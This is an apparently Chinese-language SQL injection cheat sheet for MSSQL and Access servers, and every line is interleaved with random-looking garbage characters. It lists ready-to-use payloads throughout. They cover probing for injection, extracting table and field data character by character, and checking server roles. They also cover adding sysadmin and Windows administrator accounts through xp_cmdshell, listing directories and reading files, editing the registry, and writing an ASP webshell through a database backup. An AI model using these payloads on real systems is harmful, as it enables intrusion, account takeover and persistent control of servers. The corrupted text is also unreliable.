1.判断是否有注入;and 1=1 ;and 1=2 c{{RP6o/j=
2.初步判断是否是mssql ;and user>0 n%d7`?tm4�
+EvY-mwfQ�
3.注入参数是字符'and [查询条件] and ''=' zx�r�bEE Q
T( CTU/a-,
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��Z^t{m!v�
��>�f:OU,"
5.判断数据库系统 ?/YT,W<c;&
C�P�L�sSv5
;and (select count(*) from sysobjects)>0 mssql R,�8460e7�
=kBWY9�:$,
;and (select count(*) from msysobjects)>0 access Z�J%i�iY��
0I}c|V��'P
(L�,>P`CR6
-cB>; f)5r
6.猜数据库 ;and (select Count(*) from [数据库名])>0 o(@^V!}V�
V?�r(�;�x�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $�|o�[l.q2
��S.*.�n�v
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4<S�=KFT_
u�X8G<7O�^
9.(1)猜字段的ascii值(access) =PmIrvr'[5
�Ti�lw��.z
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yhx�Z^�(I�
[�-�hsG E
(2)猜字段的ascii值(mssql) �@ 5�V3I�^
;ed�t["E�u
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 8.�tp#�x,A
"vo
�o!&<�
10.测试权限结构(mssql) p�sAr>:�\3
_YA;Nd#%k�
B�i`m�+o�b
v4W<�_
7L_
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- MNH-SQB��|
+|.6xC7��U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- a9p6�[qOcd
l*|m(�7�s�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- POb2U1�Sj�
>�]�/aG�!�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- t�R�EC)+*\
hEfFM�i=a`
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- S*(n��s<�L
(2'q~Z+>'�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ?dQ#%06mn
?#J;�[y\�^
;and 1=(select IS_MEMBER('db_owner'));-- V�e�e�;�&�
f=Kt�[|%'e
~?:Xi_3Lo�
Y��zih-$�g
11.添加mssql和系统的帐户 VR���vX^w0
vve[.L�ud'
;exec master.dbo.sp_addlogin username;-- �f= 33�+8I
;exec master.dbo.sp_password null,username,password;-- ��m8z414o�
m�$A�-'�*'
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��l/�6(V:�
�0r�%,|FaS
;exec master.dbo.xp_cmdshell 'net user username password `�YK%��I8
&�`� weW��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �!��345���
�2VgV�n�,c
;exec master.dbo.xp_cmdshell 'net user username password /add';-- {3N�5Fi7�S
�FSyeD�C^@
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �Q�Ui=�ZD1
jHM�}({)�-
1w|u
^[~u\
z{�G@t0q�
12.(1)遍历目录 G�-�G\l?R(
�Wfj*)j
Q�
;create table dirs(paths varchar(100), id int) �3R[,,WAj$
�(d}z>?L�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �(!dw�UB��
Tu��M�D+^x
;and (select top 1 paths from dirs)>0 c7/fQc)h4d
'D�CB 7�T8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �[p 8�fg!|
�d>�jR��w
T`r\y��l}�
<UBB&�}R�0
(2)遍历目录 AG��gL`�sP
-LMO
f�[v?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
�]tO9�<��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 G�F��O(O�
���#)28ESj
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 0?\d%J!"S�
/�r��m��m@
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 \I~9�%Q�J>
TD�j���jaO
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �vV �/f�TO
`�yWWX�.`�
I cz)�Qtg|
f*G�dH�UZ*
13.mssql中的存储过程 �S0-�/��9h
^]��1M8R�,
xp_regenumvalues 注册表根键, 子键 ${��w\^6�&
�q)�K�Lf�\
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �r�Q$�Jk[Y
zoO9N oUHW
xp_regread 根键,子键,键值名 ~r��iV9�_-
F ][Q�H\�N
;exec xp_regread n^;Sh$��Os
N!#TK���9�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8CN�0�Q&�|
7E�ukrE<b'
xp_regwrite 根键,子键, 值名, 值类型, 值 x�N]88L}Tn
�1F5�8 2 l
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 a>/j�W-�?�
2�=�ZZR8v�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 T0�Zv���.�
]�WP[hF
xp_regdeletevalue 根键,子键,值名 �DeL7�s��U
n�Lv"�O�N~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 yct^A�N|%�
VS_xC�$X!S
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ���@&�E{
L
}!�0�nb)kL
��"�N4rh<<
f3Cj�j]RFv
14.mssql的backup创建webshell �Uk�V{4*E�
)4/227b/(�
use model @��Zd�/>�'
ZsikI@?��
create table cmd(str image); iv�]*���HE
*C n� `pfO
insert into cmd(str) values (''); �jM��� D�G
wa}�\bNKQk
backup database model to disk='c:\l.asp'; YQk<�1./}I
SUQk0� �(M
??.9`3CYo�
7Yrp#u��1!
15.mssql内置函数 �H�3Z��"�u
_/zK��^S)�
;and (select @@version)>0 获得Windows的版本号 '�dTg\
Qv�
.�k�o}�m�{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^�6[o$eY3
qC?�\i[�'`
;and (select user_name())>0 爆当前系统的连接用户 V=|X=:fuih
0/Wo��":R:
;and (select db_name())>0 得到当前连接的数据库 �LV�X01ox$
�4,pS�C���
7ZVW�7%,zF
T2V#
fY�Cc
16.简洁的webshell #`9D,+2iB%
xX]92���Q�
use model }R -az��N;
EO[U�ezuU�
create table cmd(str image); MGzuQ�rl{H
(o�5+9'y"9
insert into cmd(str) values (''); ���h#iFp9N
ZT;:Hxv0N�
backup database model to disk='g:\wwwtest\l.asp';
